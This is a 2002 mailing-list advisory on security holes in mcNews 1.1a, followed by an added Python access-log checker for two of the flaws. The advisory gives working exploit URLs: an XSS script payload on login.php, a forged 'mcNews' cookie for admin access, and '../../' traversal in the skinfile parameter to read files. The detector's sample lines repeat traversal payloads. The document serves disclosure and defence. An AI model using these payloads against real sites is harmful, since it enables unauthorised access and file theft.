Security holes : mcNews

From: frog frog (leseulfrogat_private)
Date: Fri May 17 2002 - 10:11:26 PDT

    Product :
    mcNews 1.1a
    http://www.phpforums.net
    
    Problems :
    - XSS
    - Path Disclosure
    - File inclusion
    - Admin access
    
    Exploits :
    - /admin/login.php?path="></form*><form name=a*><input name=i value=XSS*><script*>alert(document.a.i.value)</script*>
    without '*'
    - Setcookie "mcNews,frog" on admin pages
    - /admin/design.php?voir=1&skinfile=../../file/to/view + mcNews cookie
    - /admin/header.php?voir=1&skinfile=../../file/to/view without mcNews cookie
    - /admin/[header or design].php?voir=1&skinfile=non-existent-file
    
    More details :
    in French :
    http://www.ifrance.com/kitetoua/tuto/mcNews.txt
    translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FmcNews.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%2Flanguage_tools
    
    frog-m@n
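
Added example (not part of the original post and not mcNews code): a web access-log check for the two issues above that are visible in the request URL, traversal sequences in `skinfile` on design.php/header.php and markup characters in `path` on login.php. The log lines are constructed samples in common log format, and the finding names are labels chosen for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints and parameters named in the advisory.
SKIN_PAGES = {"/admin/design.php", "/admin/header.php"}
LOGIN_PAGE = "/admin/login.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"]')

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/May/2002:10:20:01 -0700] "GET /admin/design.php?voir=1&skinfile=../../file/to/view HTTP/1.0" 200 512',
    '203.0.113.5 - - [17/May/2002:10:20:09 -0700] "GET /admin/header.php?voir=1&skinfile=%252e%252e%2Fconfig HTTP/1.0" 200 311',
    '198.51.100.7 - - [17/May/2002:10:21:44 -0700] "GET /admin/login.php?path=%22%3E%3Cb%3E HTTP/1.0" 200 940',
    '192.0.2.10 - - [17/May/2002:10:22:30 -0700] "GET /admin/design.php?voir=1&skinfile=default.skin HTTP/1.0" 200 1288',
]


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before inspecting."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return a sorted list of findings for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    page = fully_decode(url.path).lower()
    params = parse_qs(url.query, keep_blank_values=True)
    findings = set()
    if page in SKIN_PAGES:
        for raw in params.get("skinfile", []):
            value = fully_decode(raw).replace("\\", "/")
            # A ".." path segment or an absolute path leaves the skin directory.
            if ".." in value.split("/") or value.startswith("/"):
                findings.add("skinfile-traversal")
    if page == LOGIN_PAGE:
        for raw in params.get("path", []):
            # Quotes or angle brackets in "path" can break out of the form tag.
            if MARKUP_RE.search(fully_decode(raw)):
                findings.add("login-path-markup")
    return sorted(findings)
```

The cookie-based admin access and the path disclosure from a missing skin file do not show up in the request line, so they need cookie logging or PHP error logs rather than this check.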
    


